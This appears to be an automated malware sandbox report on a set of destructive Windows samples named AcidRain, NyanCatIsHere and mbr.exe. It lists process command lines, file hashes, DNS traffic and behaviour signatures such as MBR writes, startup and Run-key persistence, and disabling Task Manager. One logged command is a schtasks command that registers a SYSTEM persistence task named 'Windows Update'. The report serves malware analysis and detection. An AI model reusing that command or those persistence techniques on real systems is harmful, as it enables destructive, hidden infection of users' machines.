bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\Magix.exe
Magix.exe
C:\Windows\system32\timeout.exe
timeout 30
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x310 0x2cc
C:\Windows\system32\taskkill.exe
taskkill /f /im bytebeat.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im Magix.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat1.exe
bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\test.exe
test.exe
C:\Windows\system32\timeout.exe
timeout 40
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3804 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\taskkill.exe
taskkill /f /im bytebeat1.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\rgb.exe
rgb.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\snd.exe
snd.exe
C:\Windows\system32\timeout.exe
timeout 50
C:\Windows\system32\taskkill.exe
taskkill /f /im rgb.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im snd.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\gl1.exe
gl1.exe
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\circle.exe
circle.exe
C:\Windows\system32\timeout.exe
timeout 65
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 211.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.201.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\F85B.bat
| MD5 | 66f47a843ad967cd8824d29bbca65017 |
| SHA1 | d5a01629302123b6289a7bd677035ed5e237baaf |
| SHA256 | 3f2b8da496e474625ade273d664cf76b8a1b8ea2ba42e8656e92b7819793cab9 |
| SHA512 | 1e151e4e1fb69aa7311d8b754e435972e7f6bf47fbf4ad3a06516821b5d5a698e80cb03cec022137643c4c38d09527c5adfbe3846962f71cc7797c81093f034e |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\prompt.vbs
| MD5 | a1b56af69ace7a3738f2aeec477c4a33 |
| SHA1 | bfec32c379a396612d16624c8548943647d15c96 |
| SHA256 | 3c5331020e62e93f1ea06df0f227af2a5dd2355307be8e728282e9ddf5a1962c |
| SHA512 | ffaff006ca9115cb259fa92309836c08b9772f6d65907236bc210532ff4dd2b38c635175d346d6818266364f6c1e5a2109e01f841594222bac10f9f890f7c337 |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\mbr.exe
| MD5 | a15d67f06d5bb68b5a22283d84fb5077 |
| SHA1 | 3fd6fd5f561e1a540d3d24956e1e61d6a31f0a68 |
| SHA256 | 7d36b6c3cefa53f821f955a7a47d11db0a10d781e0ca2d2d2217feca4fc9c235 |
| SHA512 | 6ff79aac54e27d41f3323bea8c3f305a8b64d88fe9fa11e7eb39913242b731821020de11b7c759ba8cdf0241746ffa2eb29e02eb8e523f1c06b592dbac474e2e |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat.exe
| MD5 | 445d48408fd9cb1bcadfb8243027a12b |
| SHA1 | cb1382d3870a4a821ce8e731d9401f7ba0c0da40 |
| SHA256 | 7a5b8795aed94dca80cc5e956f1b409135735637cc556c7b533acd6b2fbaee58 |
| SHA512 | b89d121f13a574d6b51125cb7b35ad68af22eeaa7b68b8cfbdcbdd228b941235a8a841906023274d93ee68ab64ca59251f6f7ffb2b59034616879e111359297f |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\Magix.exe
| MD5 | 026992ed7c38fae57e8839a6c0d883c8 |
| SHA1 | 9b389aa3dd774f3cfff3dcbe8ea8779ef005b31f |
| SHA256 | 68cb1fe2ee7c3f69fe2d508d117b502ed19337bd332e722605e491a823f89645 |
| SHA512 | d20fe47538b9e1fa0ccf198f5a4a31506cc59622b2492e9f64435fb06b66ccf93cde056693656da626ebf56ab434425fbf3291db979fe6c67b2a7a14649d9dc7 |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat.wav
| MD5 | d6c579826cfdb4716612eefb5ee07c78 |
| SHA1 | a179e34b8811935942846451b98064c973c02c1a |
| SHA256 | aa2e99a722498dbc75870a1abc7a351da46b1bde1b349148efb5a237312c46fd |
| SHA512 | ada16dfef3f9e264108dff6ee975b79f38a38a733cff82b788897a140fa197f6816be1bea0ef425a56380d03fd6d45652ae4c8fbaef1a964bb1b7055af989c10 |
memory/2876-43-0x0000000000400000-0x0000000000423000-memory.dmp
memory/2796-44-0x0000000000400000-0x000000000041D000-memory.dmp
memory/2852-45-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2852-47-0x0000000000400000-0x0000000000413000-memory.dmp
memory/2852-49-0x0000000000400000-0x0000000000413000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat1.exe
| MD5 | 6b673ece600bcc8a665ebf251d7d926e |
| SHA1 | 64ef7c73a713bf3c55fb4ac4e5366a7a425f1b4e |
| SHA256 | 41ac58d922f32134e75e87898d2c179d478c81edaae0d9bc28e7ce7d6f422f8b |
| SHA512 | feb18a1aa72de47fd67919e196abd200afdf22ad5a7e5dac20593252d8b2ca86982bb07c2fed3681ef06c9933c6d197590c1df65aa5df93cb6abafca5e53e9ff |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\test.exe
| MD5 | 64a69d3a6620009ebe49595a5d8d119e |
| SHA1 | 4d478712f6503dc7f32e600d7b5aa0118c83214d |
| SHA256 | 199e4e84b644b264d170b04945880f095790206c65fdfb5a88c8ab73bd29357d |
| SHA512 | b2e6ace579201f74abea5d4aecf416980ab028d1876ffc57e474b2b2142489ec4589a4c151eafa4a9067b446396829a370c882b0d40ab8073ad7ff266bd6653f |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\bytebeat1.wav
| MD5 | cea9d2316f0e62a4fe233d6d9445fc53 |
| SHA1 | b058e7d7d96b717e6a47606eb6f632c4444ff800 |
| SHA256 | f61e579cdd011ea354c4d19bdfe140df9870f372ebe7b3ec747140a0771fe1a1 |
| SHA512 | e73aaeae358dc340c046f61dd29a629a3b2a20ebed7966a1d92da820c484154093bf42330cd0e0ad96373d2a25d1f0237abd8e34cdfd3ca9ccb3d6d310400394 |
memory/4064-57-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\rgb.exe
| MD5 | bfc9e8ab494313d6efb67fc8942f5ee9 |
| SHA1 | 1b42cc97803221538e020cb90517cb808cf19381 |
| SHA256 | 33cbdb6e00f3f42f58502af8a9150604a44bb9b26825c909aa0edb5c744a1f13 |
| SHA512 | 2d01f92397b65eade1f6140f80e2cb626b3e53b112c7e77e84ea7f6092b07c05eacb9e5e9bcb4676c8bdd10fcfba4fe297f2a01eedffffa594af87839baae030 |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\snd.exe
| MD5 | 7baad7b6dcd387183540a1a771e1b8d5 |
| SHA1 | 8fb4bc170b6e3050135e0c7b651441dbe963d7fc |
| SHA256 | 57e598fa7a93d50258afb6e563266521ae0bd35e6f80b247eb24a31a56a32461 |
| SHA512 | cfb85b10af70cc053a7c31a5d64741286b64eebd8ac9f3a97e6ed9989e81c629041808ce337d7b8c590f069da9a05e38e9b8dcf89b70e561362bff010732800b |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\noise.wav
| MD5 | 5144895869d5441a2a997bdb6d1b8576 |
| SHA1 | 357c7710b18c60ac13538506e43c4558c1422252 |
| SHA256 | 2cf498b82d0d0c51cf10a82e7221d24ad4afd378f31f79253261729e71e95b73 |
| SHA512 | 1c6d6cec3c2b9666b2c673fdda49eb431d2d321d77c7ce82a8033ff05dedb30a4145deec85f56235db1ad07b3540125b8d33fafc13f9e0569e55ea49a207215f |
memory/1504-68-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4392-69-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\gl1.exe
| MD5 | ac0cdb57f020158a4f356f0f819ac9a8 |
| SHA1 | 2fa07803943314ff4ff9a6ece448caccf327db54 |
| SHA256 | a47b0210f10011d86c59f19f929a860eaa2bd363ec1e01927c4edad404656b4b |
| SHA512 | a12a7441a107df43682bfe581d56891910bf8906b18a4049e822828c5d6d376e32ee69fc7f983afe98e9c1067e2962fa2895b643e4699568c4e053d89ca7b1eb |
C:\Users\Admin\AppData\Local\Temp\F84A.tmp\circle.exe
| MD5 | ed169e40a69cf73fd3ac59215b24063f |
| SHA1 | 32d49462e74e6c08b941d8cd530a5f3c0f3b5764 |
| SHA256 | b8ffde2fc69292ffa1a704a1cf977eedfc86277a61d4937245d218d22674178c |
| SHA512 | f949a7b9b5dae91f887e7ce9bb45f7500534873d3baab5f5c2b1c31b1e185e70278ceb9d4f03f495460e0fb96399239fa678b0b4750ee870cbaa6333ab5ebb6c |
memory/2176-84-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4156-85-0x0000000000400000-0x0000000000409000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
140s
Max time network
193s
Command Line
Signatures
Disables Task Manager via registry modification
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_259457664 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\NyanCatIsHere.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\SysWOW64\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\SysWOW64\mspaint.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\Total = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\ = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "25" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000643978e0fa32ab2a726da7b5341c88db8eb55271660135a44dbfca952f45c9c3000000000e8000000002000020000000a92116c5fbbb634f49f00286edfd3ef6d6d4a143f96e9184d0817f4a62dea3e4200000002392cd3a10dcab0a19a4b0fdd9d67e8075372cddf77769f5b1fe6ade8199cd3d40000000238f92f17e549db036b894ac49280684eedde535e8d2634cef8349dba4ed3e20e9a6d7bede43d4b7f18abcf52f585426657fe5e0d50eaff11a5b971faab96894 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "415573405" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "25" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0c9f9cbe06cda01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\ = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b000000000200000000001066000000010000200000008321d6912e6e3a143cb4db4cd44facf5b12d4e25a695c16c60fac99e756300f5000000000e8000000002000020000000ee5e959407919ee0ffad8d5d729f4e56f2685642d29e6509ea07e08058215fda900000008b0e8dd6358a3a7b9c5e3c7d4fa9543d54d0ed94ec0bf87b105a13ed85be7411cf007d4368f472ab0de7b12c359792108b1ac4b4ef2101e29c32e8636f835b71dc0acdfee1c93a26d83fb7b3e8ac794d6f020a0c9f190c8b5e906eb9cfd07f32015628cfca13ba27dd351636a2563137606b41ca8f975150e8b4d5eb837ee80669c612a833e2d6128ba25f96fd038d8f400000009dd4bceb7545f84fcf02cb6bd8342215e9ef6a5772916a94ff5e3b46d1bc25a6e0dff4a980b2f82440cd7e7b744312da4430dbd1043714092d1e4aba93bffd28 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\Total = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
